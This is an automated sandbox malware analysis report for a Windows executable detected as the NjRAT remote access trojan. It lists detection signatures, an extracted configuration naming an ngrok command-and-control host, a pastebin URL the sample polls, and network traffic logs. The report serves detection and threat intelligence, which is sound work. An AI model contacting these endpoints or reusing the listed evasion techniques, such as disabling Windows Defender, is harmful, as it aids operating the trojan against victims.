Windows Analysis Report
G1lnGpOLK4.exe

Overview

General Information

Sample name: G1lnGpOLK4.exe
renamed because original name is a hash value
Original sample name: 97d72efbb1f6fea3f158b136c330689d.exe
Analysis ID: 1435109
MD5: 97d72efbb1f6fea3f158b136c330689d
SHA1: 43c884250ed032ced44d72d932518e831a34161d
SHA256: 2ff91319fbcc02e9dd7d80e21f5f7f48e0ae24b99a1b26625d344ab4812f37c4
Tags: 32exe
Infos:

Detection

Njrat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Njrat
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to log keystrokes (.Net Source)
Disables Windows Defender (via service or powershell)
Disables zone checking for all users
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
NjRAT RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
 https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: G1lnGpOLK4.exe Avira: detected
Found malware configuration
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack Malware Configuration Extractor: Njrat {"Host": "0.tcp.eu.ngrok.io", "Port": "18350", "Version": "<- NjRAT 0.7d Horror Edition ->", "Registry Name": "f2d4732908d59805d830a49d36974ac0", "Campaign ID": "Victim", "Network Seprator": "Y262SUCZ4UJJ"}
Multi AV Scanner detection for domain / URL
Source: 0.tcp.eu.ngrok.io Virustotal: Detection: 16% Perma Link
Source: 0.tcp.eu.ngrok.io Virustotal: Detection: 16% Perma Link
Multi AV Scanner detection for submitted file
Source: G1lnGpOLK4.exe ReversingLabs: Detection: 68%
Source: G1lnGpOLK4.exe Virustotal: Detection: 70% Perma Link
Yara detected Njrat
Source: Yara match File source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: G1lnGpOLK4.exe PID: 2472, type: MEMORYSTR
Machine Learning detection for sample
Source: G1lnGpOLK4.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: G1lnGpOLK4.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49745 version: TLS 1.0
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_88e266cb2fac7c0d\MSVCR80.dll Jump to behavior
Source: unknown HTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: G1lnGpOLK4.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 0.tcp.eu.ngrok.io
Connects to a pastebin service (likely for C&C)
Source: unknown DNS query: name: pastebin.com
Yara detected Generic Downloader
Source: Yara match File source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49749 -> 18.192.31.165:15155
Source: global traffic TCP traffic: 192.168.2.4:49777 -> 3.124.142.205:15155
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 3.124.142.205 3.124.142.205
Source: Joe Sandbox View IP Address: 18.192.31.165 18.192.31.165
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49745 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGPufzLEGIjDTt_akc_527nJ4zoGCbAZn0AkDcVIV2VLuAM78mz4Tuc4onQdlIzVDE6yNOrZBZH0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-04; NID=513=TDdb6B1qf0imS6sQ9UI386TSBmUeGbONEAs1g_SjFnFVZT8tlWjduo1BWv8tK_X2kdpw5DyqH6DyKssZClnoNAKybygsq-HKlTpEzxscqZJ_pjS1BKmEZAqlwshMLYfbeJHYWJdOjDcEir8XmubnkA88KvIUU07OLdpJjmvAUwk
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGPufzLEGIjDqkokB_Yx903z9S8-TdyWhW8iPlrZBrgRiiMPzrxlLxgoQH634QKXADTY9t1vdNmMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-04; NID=513=TDdb6B1qf0imS6sQ9UI386TSBmUeGbONEAs1g_SjFnFVZT8tlWjduo1BWv8tK_X2kdpw5DyqH6DyKssZClnoNAKybygsq-HKlTpEzxscqZJ_pjS1BKmEZAqlwshMLYfbeJHYWJdOjDcEir8XmubnkA88KvIUU07OLdpJjmvAUwk
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hBoxWr7ezrOa1ze&MD=M6HZe6PE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hBoxWr7ezrOa1ze&MD=M6HZe6PE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: pastebin.com
Source: global traffic DNS traffic detected: DNS query: 0.tcp.eu.ngrok.io
Source: G1lnGpOLK4.exe, 00000000.00000002.4072983013.00000000030A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com
Source: G1lnGpOLK4.exe, 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072983013.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/s4TipmJt
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
